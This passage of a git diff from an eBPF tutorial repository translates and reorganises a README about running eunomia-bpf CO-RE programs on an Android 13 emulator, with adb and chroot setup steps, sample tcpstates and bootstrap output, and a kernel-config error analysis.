的一种实践方式,其核心依赖是 libbpf,相信对 eunomia-bpf 的测试工作能够为其他 CO-RE 方案提供参考。 +> [eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) is an open-source project that combines libbpf and WebAssembly technology, aiming to simplify the writing, compilation, and deployment of eBPF programs. This project can be seen as a practical way of implementing CO-RE, with libbpf as its core dependency. It is believed that the testing work of eunomia-bpf can provide reference for other CO-RE schemes. -## 测试环境 +## Test Environment -+ Android Emulator(Android Studio Flamingo | 2022.2.1) ++ Android Emulator (Android Studio Flamingo | 2022.2.1) + AVD: Pixel 6 -+ Android Image: Tiramisu Android 13.0 x86_64(5.15.41-android13-8-00055-g4f5025129fe8-ab8949913) ++ Android Image: Tiramisu Android 13.0 x86_64 (5.15.41-android13-8-00055-g4f5025129fe8-ab8949913) -## 环境搭建[^SeeFlowerX] +## Environment Setup[^SeeFlowerX] -1. 从 [eadb 仓库](https://github.com/tiann/eadb) 的 releases 页面获取 `debianfs-amd64-full.tar.gz` 作为 Linux 环境的 rootfs,同时还需要获取该项目的 `assets` 目录来构建环境; -2. 从 Android Studio 的 Device Manager 配置并启动 Android Virtual Device; -3. 通过 Android Studio SDK 的 adb 工具将 `debianfs-amd64-full.tar.gz` 和 `assets` 目录推送到 AVD 中: +1. 
Obtain `debianfs-amd64-full.tar.gz` from the releases page of the [eadb repository](https://github.com/tiann/eadb) as the rootfs of the Linux environment. Also, get the `assets` directory from this project to build the environment. +2. Configure and start the Android Virtual Device in the Android Studio Device Manager. +3. Push `debianfs-amd64-full.tar.gz` and the `assets` directory to the AVD using the adb tool from the Android Studio SDK: + + `./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz` + + `./adb push assets /data/local/tmp/assets` +4. Use adb to enter the Android shell environment and obtain root permissions: + + `./adb shell` + + `su` +5. Build and enter the debian environment in the Android shell: + + `mkdir -p /data/eadb` + + `mv /data/local/tmp/assets/* /data/eadb` + + `mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz` + + `rm -r /data/local/tmp/assets` + + `chmod +x /data/eadb/device-*` + + `/data/eadb/device-unpack` + + `/data/eadb/run /data/eadb/debian` + +At this point, the Linux environment required for testing eBPF has been set up. In addition, in the Android shell (before entering debian), you can use `zcat /proc/config.gz` in conjunction with `grep` to view kernel compilation options. + +> Currently, the debian environment packaged by eadb has an old version of libc and lacks many tool dependencies. Additionally, due to different kernel compilation options, some eBPF features may not be available. + +## Build Tools + +Clone the eunomia-bpf repository into the local debian environment. For the specific build process, refer to the repository's [build.md](https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md). In this test, I compiled the examples with `ecc` to generate `package.json`. Please refer to the [repository page](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler) for the build and usage instructions for this tool. + +> During the build process, you may need to manually install tools such as `curl`, `pkg-config`, `libssl-dev`, etc. + +## Results + +Some eBPF programs can be executed successfully on Android, while others fail to run for various reasons.
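Before walking through the individual examples, it helps to confirm what the kernel actually provides. The quick check below runs from the Android shell (outside the debian chroot), using the `zcat /proc/config.gz` approach mentioned above; the two options queried are the ones that turned out to matter in this test:

```console
# Run as root in the Android shell, before entering the debian environment.
# CONFIG_DEBUG_INFO_BTF is needed for CO-RE; CONFIG_FTRACE_SYSCALLS is needed
# for the syscalls tracepoints that some of the examples below rely on.
zcat /proc/config.gz | grep -E 'CONFIG_DEBUG_INFO_BTF|CONFIG_FTRACE_SYSCALLS'
```

On the image tested here, the first option is set while the second is not, which matches the successes and failures described next.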
-### 成功案例 +### Success Cases #### [bootstrap](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/bootstrap) -运行输出如下: +The output of running is as follows: ```console TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT @@ -77,7 +76,7 @@ TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT #### [tcpstates](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/tcpstates) -开始监测后在 Linux 环境中通过 `wget` 下载 Web 页面: +After starting monitoring, download a web page using `wget` in the Linux environment: ```console TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK @@ -90,7 +89,7 @@ TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE F 09:07:47 0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet ``` -开始检测后在 Android Studio 模拟界面打开 Chrome 浏览器并访问百度页面: +Start the detection and open the Chrome browser in the Android Studio simulation interface to access the Baidu page: ```console TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK @@ -100,8 +99,7 @@ TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE F 07:46:58 0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService 07:46:58 0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService 07:46:58 0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService -07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService -07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg +07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService".07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg 07:46:59 0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService 07:46:59 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService 07:46:59 0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0 @@ -116,11 +114,7 @@ TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE F 07:47:01 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet ``` -### 一些可能的报错原因 - -#### [opensnoop](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/opensnoop) - -例如 opensnoop 工具,可以在 Android 上成功构建,但运行报错: +Note: some error messages may appear in the Android shell during the test: ```console libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory @@ -130,25 +124,27 @@ failed to attach skeleton Error: BpfError("load and attach ebpf program failed") ``` -后经查看发现内核未开启 `CONFIG_FTRACE_SYSCALLS` 选项,导致无法使用 syscalls 的 tracepoint。 +Later, after investigation, it was found that the kernel did not enable the 
`CONFIG_FTRACE_SYSCALLS` option, which made the syscalls tracepoints unavailable. -## 总结 +## Summary -在 Android shell 中查看内核编译选项可以发现 `CONFIG_DEBUG_INFO_BTF` 默认是打开的,在此基础上 eunomia-bpf 项目提供的 example 已有一些能够成功运行的案例,例如可以监测 `exec` 族函数的执行和 tcp 连接的状态。 +Viewing the kernel compilation options in the Android shell shows that `CONFIG_DEBUG_INFO_BTF` is enabled by default. On this basis, some of the examples provided by the eunomia-bpf project already run successfully, such as monitoring the execution of the `exec` family of functions and the state of TCP connections. -对于无法运行的一些,原因主要是以下两个方面: +For the cases that fail to run, the reasons fall mainly into two categories: -1. 内核编译选项未支持相关 eBPF 功能; -2. eadb 打包的 Linux 环境较弱,缺乏必须依赖; +1. The kernel compilation options do not support the relevant eBPF functionality; +2. The Linux environment packaged by eadb is minimal and lacks necessary dependencies. -目前在 Android 系统中使用 eBPF 工具基本上仍然需要构建完整的 Linux 运行环境,但 Android 内核本身对 eBPF 的支持已较为全面,本次测试证明较高版本的 Android 内核支持 BTF 调试信息和依赖 CO-RE 的 eBPF 程序的运行。 +Currently, using eBPF tools on Android still requires building a complete Linux runtime environment, but the Android kernel itself already has fairly comprehensive eBPF support. This test shows that recent Android kernels support BTF debug information and can run CO-RE-based eBPF programs. -Android 系统 eBPF 工具的发展需要官方新特性的加入,目前看来通过 Android APP 直接使用 eBPF 工具需要的工作量较大,同时由于 eBPF 工具需要 root 权限,普通 Android 用户的使用会面临较多困难。 +The development of eBPF tooling on Android depends on official support for new features. For now, using eBPF tools directly from an Android app would require substantial effort, and since eBPF tools need root privileges, ordinary Android users face additional hurdles. -如果希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website for more examples and complete tutorials.
-## 参考 +## Reference -[^Google]: -[^WeiShu]: -[^SeeFlowerX]: ++ [Google android docs](https://source.android.google.cn/docs/core/architecture/kernel/bpf) ++ [weixin WeiShu](https://mp.weixin.qq.com/s/mul4n5D3nXThjxuHV7GpMA) ++ [SeeFlowerX](https://blog.seeflower.dev/archives/138/>) + +> The original link of this article: diff --git a/src/22-android/README.zh.md b/src/22-android/README.zh.md new file mode 100644 index 0000000..07d7114 --- /dev/null +++ b/src/22-android/README.zh.md @@ -0,0 +1,154 @@ +# 在 Android 上使用 eBPF 程序 + +> 本文主要记录了笔者在 Android Studio Emulator 中测试高版本 Android Kernel 对基于 libbpf 的 CO-RE 技术支持程度的探索过程、结果和遇到的问题。 +> 测试采用的方式是在 Android Shell 环境下构建 Debian 环境,并基于此尝试构建 eunomia-bpf 工具链、运行其测试用例。 + +## 背景 + +截至目前(2023-04),Android 还未对 eBPF 程序的动态加载做出较好的支持,无论是以 bcc 为代表的带编译器分发方案,还是基于 btf 和 libbpf 的 CO-RE 方案,都在较大程度上离不开 Linux 环境的支持,无法在 Android 系统上很好地运行[^WeiShu]。 + +虽然如此,在 Android 平台上尝试 eBPF 也已经有了一些成功案例,除谷歌官方提供的修改 `Android.bp` 以将 eBPF 程序随整个系统一同构建并挂载的方案[^Google],也有人提出基于 Android 内核构建 Linux 环境进而运行 eBPF 工具链的思路,并开发了相关工具。 + +目前已有的资料,大多基于 adeb/eadb 在 Android 内核基础上构建 Linux 沙箱,并对 bcc 和 bpftrace 相关工具链进行测试,而对 CO-RE 方案的测试工作较少。在 Android 上使用 bcc 工具目前有较多参考资料,如: + ++ SeeFlowerX: ++ evilpan: + +其主要思路是利用 chroot 在 Android 内核上运行一个 Debian 镜像,并在其中构建整个 bcc 工具链,从而使用 eBPF 工具。如果想要使用 bpftrace,原理也是类似的。 + +事实上,高版本的 Android 内核已支持 btf 选项,这意味着 eBPF 领域中新兴的 CO-RE 技术也应当能够运用到基于 Android 内核的 Linux 系统中。本文将基于此对 eunomia-bpf 在模拟器环境下进行测试运行。 + +> [eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) 是一个结合了 libbpf 和 WebAssembly 技术的开源项目,旨在简化 eBPF 程序的编写、编译和部署。该项目可被视作 CO-RE 的一种实践方式,其核心依赖是 libbpf,相信对 eunomia-bpf 的测试工作能够为其他 CO-RE 方案提供参考。 + +## 测试环境 + ++ Android Emulator(Android Studio Flamingo | 2022.2.1) ++ AVD: Pixel 6 ++ Android Image: Tiramisu Android 13.0 x86_64(5.15.41-android13-8-00055-g4f5025129fe8-ab8949913) + +## 环境搭建[^SeeFlowerX] + +1. 从 [eadb 仓库](https://github.com/tiann/eadb) 的 releases 页面获取 `debianfs-amd64-full.tar.gz` 作为 Linux 环境的 rootfs,同时还需要获取该项目的 `assets` 目录来构建环境; +2. 从 Android Studio 的 Device Manager 配置并启动 Android Virtual Device; +3. 通过 Android Studio SDK 的 adb 工具将 `debianfs-amd64-full.tar.gz` 和 `assets` 目录推送到 AVD 中: + + `./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz` + + `./adb push assets /data/local/tmp/assets` +4. 通过 adb 进入 Android shell 环境并获取 root 权限: + + `./adb shell` + + `su` +5. 
在 Android shell 中构建并进入 debian 环境: + + `mkdir -p /data/eadb` + + `mv /data/local/tmp/assets/* /data/eadb` + + `mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz` + + `rm -r /data/local/tmp/assets` + + `chmod +x /data/eadb/device-*` + + `/data/eadb/device-unpack` + + `/data/eadb/run /data/eadb/debian` + +至此,测试 eBPF 所需的 Linux 环境已经构建完毕。此外,在 Android shell 中(未进入 debian 时)可以通过 `zcat /proc/config.gz` 并配合 `grep` 查看内核编译选项。 + +>目前,eadb 打包的 debian 环境存在 libc 版本低,缺少的工具依赖较多等情况;并且由于内核编译选项不同,一些 eBPF 功能可能也无法使用。 + +## 工具构建 + +在 debian 环境中将 eunomia-bpf 仓库 clone 到本地,具体的构建过程,可以参考仓库的 [build.md](https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md)。在本次测试中,笔者选用了 `ecc` 编译生成 `package.json` 的方式,该工具的构建和使用方式请参考[仓库页面](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler)。 + +>在构建过程中,可能需要自行安装包括但不限于 `curl`,`pkg-config`,`libssl-dev` 等工具。 + +## 结果 + +有部分 eBPF 程序可以成功在 Android 上运行,但也会有部分应用因为种种原因无法成功被执行。 + +### 成功案例 + +#### [bootstrap](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/bootstrap) + +运行输出如下: + +```console +TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT +09:09:19 10217 479 0 0 sh /system/bin/sh 0 +09:09:19 10217 479 0 0 ps /system/bin/ps 0 +09:09:19 10217 479 0 54352100 ps 1 +09:09:21 10219 479 0 0 sh /system/bin/sh 0 +09:09:21 10219 479 0 0 ps /system/bin/ps 0 +09:09:21 10219 479 0 44260900 ps 1 +``` + +#### [tcpstates](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/tcpstates) + +开始监测后在 Linux 环境中通过 `wget` 下载 Web 页面: + +```console +TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK +09:07:46 0x4007000200005000000000000f02000a 0x5000000000000f02000a8bc53f77 18446635827774444352 3315344998 0 10115 7 2 2 0 80 wget +09:07:46 0x40020002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315465870 120872 0 2 1 2 55694 80 swapper/0 +09:07:46 0x40010002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315668799 202929 10115 1 4 2 55694 80 wget +09:07:46 0x40040002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315670037 1237 0 4 5 2 55694 80 swapper/0 +09:07:46 0x40050002000050003d99f8090f02000a 0x50003d99f8090f02000a8bc53f77 18446635827774444352 3315670225 188 0 5 7 2 55694 80 swapper/0 +09:07:47 0x400200020000bb01565811650f02000a 0xbb01565811650f02000a6aa0d9ac 18446635828348806592 3316433261 0 2546 2 7 2 49970 443 ChromiumNet +09:07:47 0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet +``` + +开始检测后在 Android Studio 模拟界面打开 Chrome 浏览器并访问百度页面: + +```console +TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK +07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020066638144 192874641 0 3305 7 2 2 0 443 NetworkService +07:46:58 0x40020002d28abb01494b6ebe0f02000a 0xd28abb01494b6ebe0f02000aeb6f2270 18446631020066638144 192921938 47297 3305 2 1 2 53898 443 NetworkService +07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132433920 193111426 0 3305 7 2 2 0 443 NetworkService +07:46:58 0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService +07:46:58 0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService +07:46:58 0x40040002b4a0bb0179ff85e80f02000a 
0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService +07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService +07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg +07:46:59 0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService +07:46:59 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService +07:46:59 0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0 +07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000a26f6e878 18446631020132433920 195193350 0 3305 7 2 2 0 443 NetworkService +07:47:00 0x40020002ba32bb01e0e09e3a0f02000a 0xba32bb01e0e09e3a0f02000a26f6e878 18446631020132433920 195206992 13642 0 2 1 2 47666 443 swapper/0 +07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132448128 195233125 0 3305 7 2 2 0 443 NetworkService +07:47:00 0x40020002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195246569 13444 3305 2 1 2 46248 443 NetworkService +07:47:00 0xf02000affff00000000000000000000 0x1aca06cffff00000000000000000000 18446631019225912320 195383897 0 947 7 2 10 0 80 Thread-11 +07:47:00 0x40010002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195421584 175014 3305 1 4 2 46248 443 NetworkService +07:47:00 0x40040002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422361 777 3305 4 5 2 46248 443 NetworkService +07:47:00 0x400500020000bb0136cac8dd0f02000a 0xbb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422450 88 3305 5 7 2 46248 443 NetworkService +07:47:01 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet +``` + +### 一些可能的报错原因 + +#### [opensnoop](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/opensnoop) + +例如 opensnoop 工具,可以在 Android 上成功构建,但运行报错: + +```console +libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory +libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to create tracepoint 'syscalls/sys_enter_open' perf event: No such file or directory +libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to auto-attach: -2 +failed to attach skeleton +Error: BpfError("load and attach ebpf program failed") +``` + +后经查看发现内核未开启 `CONFIG_FTRACE_SYSCALLS` 选项,导致无法使用 syscalls 的 tracepoint。 + +## 总结 + +在 Android shell 中查看内核编译选项可以发现 `CONFIG_DEBUG_INFO_BTF` 默认是打开的,在此基础上 eunomia-bpf 项目提供的 example 已有一些能够成功运行的案例,例如可以监测 `exec` 族函数的执行和 tcp 连接的状态。 + +对于无法运行的一些,原因主要是以下两个方面: + +1. 内核编译选项未支持相关 eBPF 功能; +2. 
eadb 打包的 Linux 环境较弱,缺乏必须依赖; + +目前在 Android 系统中使用 eBPF 工具基本上仍然需要构建完整的 Linux 运行环境,但 Android 内核本身对 eBPF 的支持已较为全面,本次测试证明较高版本的 Android 内核支持 BTF 调试信息和依赖 CO-RE 的 eBPF 程序的运行。 + +Android 系统 eBPF 工具的发展需要官方新特性的加入,目前看来通过 Android APP 直接使用 eBPF 工具需要的工作量较大,同时由于 eBPF 工具需要 root 权限,普通 Android 用户的使用会面临较多困难。 + +如果希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +## 参考 + +[^Google]: +[^WeiShu]: +[^SeeFlowerX]: diff --git a/src/22-android/README_en.md b/src/22-android/README_en.md deleted file mode 100644 index f1f660b..0000000 --- a/src/22-android/README_en.md +++ /dev/null @@ -1,150 +0,0 @@ -# eBPF Tutorial by Example: Using eBPF Programs on Android - -> This article mainly documents the author's exploration process, results, and issues encountered while testing the level of support for CO-RE technology based on the libbpf library on high version Android kernels in the Android Studio Emulator. -> The test was conducted by building a Debian environment in the Android Shell environment and attempting to build the eunomia-bpf toolchain and run its test cases based on this. - -## Background - -As of now (2023-04), Android has not provided good support for dynamic loading of eBPF programs. Both the compiler distribution scheme represented by bcc and the CO-RE scheme based on btf and libbpf rely heavily on Linux environment support and cannot run well on the Android system.[^WeiShu] - -However, there have been some successful cases of trying eBPF on the Android platform. In addition to the solution provided by Google to modify `Android.bp` to build and mount eBPF programs with the entire system[^Google], some people have proposed building a Linux environment based on the Android kernel and running the eBPF toolchain using this approach, and have developed related tools. - -Currently available information mostly focuses on the testing of bcc and bpftrace toolchains based on the adeb/eadb sandbox built on the Android kernel, with less testing work on the CO-RE scheme. There is more reference material available for using the bcc tool on Android, such as: - -+ SeeFlowerX: -+ evilpan: - -The main idea is to use chroot to run a Debian image on the Android kernel and build the entire bcc toolchain within it in order to use eBPF tools. The same principle applies to using bpftrace. - -In fact, higher versions of the Android kernel already support the btf option, which means that the emerging CO-RE technology in the eBPF field should also be applicable to Linux systems based on the Android kernel. This article will test and run eunomia-bpf in the emulator environment based on this. - -> [eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) is an open-source project that combines libbpf and WebAssembly technology, aiming to simplify the writing, compilation, and deployment of eBPF programs. This project can be seen as a practical way of implementing CO-RE, with libbpf as its core dependency. It is believed that the testing work of eunomia-bpf can provide reference for other CO-RE schemes. - -## Test Environment - -+ Android Emulator (Android Studio Flamingo | 2022.2.1) -+ AVD: Pixel 6 -+ Android Image: Tiramisu Android 13.0 x86_64 (5.15.41-android13-8-00055-g4f5025129fe8-ab8949913) - -## Environment Setup[^SeeFlowerX] - -1. Obtain `debianfs-amd64-full.tar.gz` from the releases page of the [eadb repository](https://github.com/tiann/eadb) as the rootfs of the Linux environment. Also, get the `assets` directory from this project to build the environment. -2. 
Configure and start the Android Virtual Device in the Android Studio Device Manager. -3. Push `debianfs-amd64-full.tar.gz` and the `assets` directory to the AVD using the adb tool from the Android Studio SDK: - + `./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz` - + `./adb push assets /data/local/tmp/assets` -4. Use adb to enter the Android shell environment and obtain root permissions: - + `./adb shell` - + `su` -5. Build and enter the debian environment in the Android shell: - + `mkdir -p /data/eadb` - + `mv /data/local/tmp/assets/* /data/eadb` - + `mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz`+ `rm -r /data/local/tmp/assets` - + `chmod +x /data/eadb/device-*` - + `/data/eadb/device-unpack` - + `/data/eadb/run /data/eadb/debian` - -At this point, the Linux environment required for testing eBPF has been set up. In addition, in the Android shell (before entering debian), you can use `zcat /proc/config.gz` in conjunction with `grep` to view kernel compilation options. - ->Currently, the debian environment packaged by eadb has a low version of libc and lacks many tool dependencies. Additionally, due to different kernel compilation options, some eBPF features may not be available. - -## Build Tools - -Clone the eunomia-bpf repository into the local debian environment. For the specific build process, refer to the repository's [build.md](https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md). In this test, I used the `ecc` compilation method to generate the `package.json`. Please refer to the [repository page](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler) for the build and usage instructions for this tool. - ->During the build process, you may need to manually install tools such as `curl`, `pkg-config`, `libssl-dev`, etc. - -## Results - -Some eBPF programs can be successfully executed on Android, but there are also some applications that cannot be executed successfully for various reasons. 
- -### Success Cases - -#### [bootstrap](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/bootstrap) - -The output of running is as follows: - -```console -TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT -09:09:19 10217 479 0 0 sh /system/bin/sh 0 -09:09:19 10217 479 0 0 ps /system/bin/ps 0 -09:09:19 10217 479 0 54352100 ps 1 -09:09:21 10219 479 0 0 sh /system/bin/sh 0 -09:09:21 10219 479 0 0 ps /system/bin/ps 0 -09:09:21 10219 479 0 44260900 ps 1 -``` - -#### [tcpstates](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/tcpstates) - -After starting monitoring, download a web page using `wget` in the Linux environment: - -```console -TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK -09:07:46 0x4007000200005000000000000f02000a 0x5000000000000f02000a8bc53f77 18446635827774444352 3315344998 0 10115 7 2 2 0 80 wget -09:07:46 0x40020002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315465870 120872 0 2 1 2 55694 80 swapper/0 -09:07:46 0x40010002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315668799 202929 10115 1 4 2 55694 80 wget -09:07:46 0x40040002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315670037 1237 0 4 5 2 55694 80 swapper/0 -09:07:46 0x40050002000050003d99f8090f02000a 0x50003d99f8090f02000a8bc53f77 18446635827774444352 3315670225 188 0 5 7 2 55694 80 swapper/0 -09:07:47 0x400200020000bb01565811650f02000a 0xbb01565811650f02000a6aa0d9ac 18446635828348806592 3316433261 0 2546 2 7 2 49970 443 ChromiumNet -09:07:47 0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet -``` - -Start the detection and open the Chrome browser in the Android Studio simulation interface to access the Baidu page: - -```console -TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK -07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020066638144 192874641 0 3305 7 2 2 0 443 NetworkService -07:46:58 0x40020002d28abb01494b6ebe0f02000a 0xd28abb01494b6ebe0f02000aeb6f2270 18446631020066638144 192921938 47297 3305 2 1 2 53898 443 NetworkService -07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132433920 193111426 0 3305 7 2 2 0 443 NetworkService -07:46:58 0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService -07:46:58 0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService -07:46:58 0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService -07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService".07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg -07:46:59 0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService -07:46:59 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService -07:46:59 0x40020002d28ebb0182dd92990f02000a 
